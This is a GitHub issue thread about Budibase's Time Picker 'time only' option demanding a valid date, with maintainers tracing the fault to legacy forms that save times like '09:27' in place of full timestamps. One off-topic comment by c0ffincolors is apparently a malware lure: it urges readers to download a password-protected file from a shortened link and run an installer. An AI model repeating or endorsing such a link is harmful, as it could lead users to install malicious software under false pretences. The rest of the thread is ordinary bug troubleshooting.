### ISSUE TITLE
Time Picker Component "time only" does not work as expected

### ISSUE THREAD

**Issue by timtandio** [Budibase/budibase#14462]
**Checklist**
- [x] I have searched budibase discussions and github issues to check if my issue already exists

**Hosting**
- Cloud
  - Tenant ID: ieducationm.budibase.app

**Describe the bug**
The Time Picker component does not work; it keeps asking for a valid date even though the 'time only' option is checked. It ask for a valid date when we try to save the form.

**To Reproduce**
1. create date/time component
2. check show time, time only and ignore timezone
3. see error below

**Screenshots**
![image](https://github.com/user-attachments/assets/3e46dd7c-2f57-46d8-85d5-bc08858585bb)
![image](https://github.com/user-attachments/assets/0f3f9801-4bbf-40f8-b87a-cbb205f26a04)
![image](https://github.com/user-attachments/assets/32a0fc81-dafe-411c-bc2a-53328c925df6)
![image](https://github.com/user-attachments/assets/99ad65d5-8212-4f26-b9b3-74c0b1920c7d)
![image](https://github.com/user-attachments/assets/bd86e5bb-c5be-4c9f-9d6e-b1ea0a08da41)

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by andz-bb** [comment]
hey @timtandio, which datasource are you using here?

**Comment by timtandio** [comment]
hi @andz-bb please see this file export. thank you
[test-export-1725471867558.tar.gz](https://github.com/user-attachments/files/16874792/test-export-1725471867558.tar.gz)

**Comment by ConorWebb96** [comment]
Hey @timtandio,

I'm not receiving any errors after importing your app. Looking at the app it seems like you are on quite an older version of Budibase. What version are you using?

I recommend updating to the latest version and trying again.

**Comment by timtandio** [comment]
Hi @ConorWebb96 !
Please see the video below. I have updated it to the latest version and tried to import and export the file, but the problem still persists. Even after I removed the validation condition, it is still showing me an error.

https://github.com/user-attachments/assets/b940abec-7566-4dd6-87f1-1d7e21987425

**Comment by ConorWebb96** [comment]
Hey @timtandio,

I believe I've found the issue. For whatever reason the field you have in your form is sending up a value that looks like this. `arrivaltime: "09:27"` What it should be sending up is: `"2024-09-06T11:00:00.000Z"` which is just the current time that was set in the time only field. (The date is ignored for this field, it just defaults it to today.)

I believe the 09:27 time was how it was previously saved in earlier versions of Budibase.

Now with the above said the only way I was able to fix this was to create a new form that stores this value correctly in the database. Copy the new field after configuring them as time only etc and paste them in to your form to replace your fields that are causing the errors. 

For whatever reason deleting and re-adding the fields to the same form doesn't resolve this, it preserves the bad formatted value thats sent up to the database.

Going to accept this as others are likely to run into the same issue.

Thanks for sending the app across + video.
